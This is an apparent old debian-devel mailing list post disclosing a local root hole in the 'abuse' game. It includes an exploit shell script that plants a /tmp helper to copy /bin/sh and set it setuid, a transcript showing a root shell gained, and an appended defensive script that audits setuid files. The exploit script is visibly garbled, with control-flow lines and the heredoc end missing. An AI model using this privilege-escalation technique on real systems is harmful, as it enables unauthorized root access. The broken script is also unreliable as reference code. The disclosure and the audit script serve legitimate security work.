
IMPORTANT: abuse security hole. Debian is vulnerable!

I applied this crack script to my system, with abuse 1.10-4 installed, and
it got me a root shell. I'm posting to debian-devel because I believe this
is a really old and well known hole in abuse, so I see no point in covering
this up.

Here's the script:


echo ================ abuser.sh - gain root on Linux Red Hat 2.1 system
echo ================ Checking system vulnerability
if test -u /usr/lib/games/abuse/abuse.console
echo ++++++++++++++++ System appears vulnerable.
cd /tmp
cat << _EOF_ > /tmp/undrv
/bin/cp /bin/sh /tmp/abuser
/bin/chmod 4777 /tmp/abuser
chmod +x /tmp/undrv
echo ================ Executing Abuse
/bin/rm /tmp/undrv
if test -u /tmp/abuser
echo ++++++++++++++++ Exploit successful, suid shell located in
echo ---------------- Exploit failed
echo ---------------- This machine does not appear to be vulnerable.


Here's a sample of it in use:

[joey@kite] /tmp>sh abuse_hole 
================ abuser.sh - gain root on Linux Red Hat 2.1 system
================ Checking system vulnerability
++++++++++++++++ System appears vulnerable.
================ Executing Abuse
 Abuse (Engine Version 1.10)
sh: lnx_sdrv: command not found
sound effects driver returned failure, sound effects disabled
Added himem block (4000000 bytes)
could not run undrv, please make sure it's in your path
No network driver, or network driver returned failure
Specs : main file set to abuse.spe
Lisp : 501 symbols defined, 99 system functions, 295 pre-compiled
Unable to open filename art/dev.spe for requested item c_mouse1
++++++++++++++++ Exploit successful, suid shell located in /tmp/abuser
[joey@kite] /tmp>abuser
bash# id
uid=500(joey) gid=500(joey) euid=0(root)
bash# whoami

For now, I recommend that everyone dpkg -r abuse. Is abuse still being
maintained, or is it orphaned?

#!/usr/bin/perl -pl-                                   # ,,ep) ayf >|)nj,,
$_=reverse lc$_;s@"@''@g;y/[]{A-Y}<>()a-y1-9,!.?`'/][} #         Joey Hess
{><)(eq)paj6y!fk7wuodbjsfn^mxhl5Eh29L86`i'%,/;s@k@>|@g # jeh22@cornell.edu
               "true - do nothing, successfully" - - true (1)
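
A defensive check for the two artifacts visible in the transcript above, as an added example that is not part of the original post: a binary that still carries the setuid bit, and a setuid copy of a shell left in a scratch directory such as /tmp. The function names, the script name in the usage comment and the list of reference shells are assumptions of this example.

```shell
#!/bin/sh
# Added example, not from the original post. Function names are hypothetical.

# Print every setuid regular file in or below the given directories.
list_setuid() {
    for dir in "$@"; do
        [ -d "$dir" ] || continue
        # -perm -4000 matches any mode that has the setuid bit set;
        # -xdev keeps the walk on one filesystem.
        find "$dir" -xdev -type f -perm -4000 -print 2>/dev/null
    done
}

# Print setuid files under $1 whose contents are byte-identical to one of
# the reference shells passed as the remaining arguments. This catches a
# renamed copy such as the /tmp/abuser file in the transcript.
find_setuid_shell_copies() {
    scan_dir=$1
    shift
    list_setuid "$scan_dir" | while IFS= read -r candidate; do
        for shell in "$@"; do
            [ -f "$shell" ] || continue
            if cmp -s "$candidate" "$shell"; then
                printf '%s\n' "$candidate"
                break
            fi
        done
    done
}

# Usage as a script (assumed file name): sh suid_audit.sh /usr/lib/games /tmp
if [ "$#" -ge 2 ]; then
    echo "setuid files under $1:"
    list_setuid "$1"
    echo "setuid shell copies under $2:"
    find_setuid_shell_copies "$2" /bin/sh /bin/bash
fi
```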
